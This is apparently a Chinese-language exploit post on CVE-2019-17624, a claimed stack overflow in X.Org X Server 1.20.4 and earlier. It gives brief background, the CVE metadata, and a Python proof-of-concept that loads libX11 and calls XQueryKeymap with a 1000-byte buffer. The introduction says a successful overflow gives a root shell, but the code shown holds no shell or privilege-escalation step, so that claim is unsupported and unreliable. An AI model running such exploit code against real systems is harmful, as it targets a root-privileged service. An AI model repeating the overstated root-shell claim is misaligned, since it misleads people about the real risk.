0x1 简单介绍:
X Server 是绝大对数Linux发行版和Unix系统的基础图形界面程序,是系统标配。而此程序也是以Root权限启动的,因而成功溢出它而获得的shell,也是root权限。
0x2 漏洞相关信息:
# 时间: 2019-10-16 # 作者: Marcelo Vázquez (s4vitar) # 厂商: https://www.x.org/ # 版本: <= 1.20.4 # 测试平台: Linux # CVE: CVE-2019-17624
0x3 POC
#!/usr/bin/python #coding: utf-8 # ************************************************************************ # * Author: Marcelo Vázquez (aka s4vitar) * # * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) * # ************************************************************************ import sys, time import ctypes as ct from ctypes import cast from ctypes.util import find_library def access_violation(x11, current_display): keyboard = (ct.c_char * 1000)() x11.XQueryKeymap(current_display, keyboard) if __name__ == '__main__': print "\n[*] Loading x11...\n" time.sleep(2) x11 = ct.cdll.LoadLibrary(find_library("X11")) current_display = x11.XOpenDisplay(None) print "[*] Exploiting...\n" time.sleep(1) try: access_violation(x11, current_display) except: print "\nError...\n" sys.exit(1)